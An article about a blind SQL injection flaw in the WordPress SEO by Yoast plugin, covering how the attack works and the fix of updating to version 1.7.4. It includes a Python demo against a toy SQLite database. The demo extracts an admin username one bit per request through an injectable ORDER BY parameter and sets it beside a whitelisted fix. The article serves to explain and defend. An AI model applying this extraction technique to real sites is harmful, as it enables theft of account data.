Most of us are familiar with WordPress SEO by Yoast, one of the most popular plugins for the WordPress content management system (CMS). It is in fact the most downloaded WordPress plugin, because it makes optimising a site for search engines easy.
But a serious vulnerability has recently been discovered in this plugin, putting tens of millions of websites at risk of being hacked. Every version of WordPress SEO by Yoast prior to the patched release is exposed to a Blind SQL Injection (SQLi) web application flaw.
What is SQLi?
SQL injection is a code injection technique used to attack data-driven applications: untrusted input is incorporated into an SQL query in a way that changes the query's structure rather than just its data. Best known as an attack vector against websites, SQLi sits in the OWASP Top 10 of web application vulnerabilities.
Blind SQLi is the variant used when an application is injectable but the query's results (and any error messages) are never shown to the attacker. Instead, the attacker asks the database yes/no questions and infers each answer from a side effect, such as a change in the page content or in the response time. This is usually time-intensive, because a new statement has to be crafted and sent for every bit of data recovered.
How does this SQLi work?
In a typical SQLi attack the attacker supplies a malformed SQL fragment through a client-side input. In the case of WordPress SEO by Yoast, however, an unauthenticated outsider cannot reach the injection point directly: the vulnerable code lives in the ‘admin/class-bulk-editor-list-table.php’ file, which only users with the Administrator, Editor or Author role are authorised to access.
To exploit it, the attacker therefore has to get one of those privileged users to send the malicious request for them. This is done through social engineering: the victim is tricked into clicking a specially crafted URL carrying the injection payload, and their browser sends it along with their logged-in session.
Once the attack has been carried out, the attackers can add their own admin account to the vulnerable WordPress site and do whatever they like with it.
This does not mean that every site with the plugin installed is already under attack. As noted above, the injection can only be triggered when a WordPress administrator, author or editor clicks the link the attacker created.
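The following is an added example, not code from the article or from the Yoast plugin, to make the "one statement per bit" cost of blind SQLi and the privileged-user requirement concrete. It assumes a hypothetical listing page whose `orderby` parameter is concatenated into an ORDER BY clause (the article does not say which parameter the real plugin mishandled); the table contents and the password-hash strings are constructed sample data, and SQLite stands in for MySQL. The only signal the "attacker" gets back is the order of the post IDs, so every character of the admin username is recovered bit by bit through true/false questions.

```python
import sqlite3

# Constructed sample data; the user_pass values are placeholder strings,
# not real WordPress hashes.
SAMPLE_USERS = [(1, "admin", "$P$Bplaceholderhash1"), (2, "editor", "$P$Bplaceholderhash2")]
SAMPLE_POSTS = [(1, "Hello world"), (2, "About")]


def make_db():
    """In-memory stand-in for the WordPress database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT)")
    conn.executemany("INSERT INTO wp_users VALUES (?,?,?)", SAMPLE_USERS)
    conn.execute("CREATE TABLE wp_posts (ID INTEGER, post_title TEXT)")
    conn.executemany("INSERT INTO wp_posts VALUES (?,?)", SAMPLE_POSTS)
    return conn


def list_posts_vulnerable(conn, orderby):
    # Hypothetical vulnerable pattern: a request parameter is pasted straight
    # into ORDER BY. The response never echoes the injected expression; the
    # attacker only sees which post comes first.
    sql = "SELECT ID, post_title FROM wp_posts ORDER BY " + orderby
    return [row[0] for row in conn.execute(sql)]


ALLOWED_ORDERBY = {"ID", "post_title"}


def list_posts_hardened(conn, orderby):
    # Fix: ORDER BY cannot take a bound placeholder, so the column name is
    # validated against a whitelist and anything else falls back to a default.
    if orderby not in ALLOWED_ORDERBY:
        orderby = "post_title"
    sql = f"SELECT ID, post_title FROM wp_posts ORDER BY {orderby}"
    return [row[0] for row in conn.execute(sql)]


class BlindOracle:
    """Turns one listing request into one yes/no answer and counts requests."""

    def __init__(self, list_fn, conn):
        self.list_fn, self.conn, self.queries = list_fn, conn, 0

    def ask(self, condition):
        self.queries += 1
        # ORDER BY ID yields [1, 2]; ORDER BY post_title yields [2, 1]
        # ("About" sorts before "Hello world"), so the row order leaks the
        # truth value of `condition`.
        payload = f"CASE WHEN ({condition}) THEN ID ELSE post_title END"
        return self.list_fn(self.conn, payload) == [1, 2]


def steal(list_fn, expr="(SELECT user_login FROM wp_users WHERE ID = 1)"):
    """Recover the string `expr` evaluates to, one bit per request.

    Returns (recovered_string, number_of_requests). In the real attack each
    request would have to be issued from a victim's authenticated session.
    """
    oracle = BlindOracle(list_fn, make_db())
    length = 0
    while length < 64 and oracle.ask(f"length({expr}) > {length}"):
        length += 1
    chars = []
    for pos in range(1, length + 1):
        value = 0
        for bit in range(7):  # 7 bits cover ASCII usernames
            if oracle.ask(f"(unicode(substr({expr}, {pos}, 1)) >> {bit}) & 1 = 1"):
                value |= 1 << bit
        chars.append(chr(value))
    return "".join(chars), oracle.queries


if __name__ == "__main__":
    print(steal(list_posts_vulnerable))  # ('admin', 41)
    print(steal(list_posts_hardened))    # ('', 1)
```

Against the vulnerable listing, a five-character username costs 41 requests (6 to find the length, 7 per character); a password hash would cost several hundred. Because every one of those requests must be made from an Administrator, Editor or Author session, a single bare link is rarely enough in practice: the crafted URL the victim clicks would typically lead to a page that fires the whole sequence from their browser. Against the hardened listing the very first length probe comes back false and nothing is recovered, which is exactly what updating the plugin buys you.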
Can this be fixed?
Of course it can. All you need to do is update the plugin to the latest version, WordPress SEO by Yoast 1.7.4. The Yoast team has patched the flaw and has also updated the Premium version of the plugin.
If you have disabled automatic updates for your plugins, re-enable them (or update the plugin manually) via:
Manage > Plugins & Themes > Auto Updates Tab
That brings the plugin up to the patched version and keeps your site out of the attackers' reach. It is often said that a WordPress site without WordPress SEO by Yoast is missing an important feature, so rather than uninstalling the plugin, simply upgrade it; the vulnerability is a serious one for site owners who rely on the plugin to boost their search engine traffic.
Source: Search Engine Journal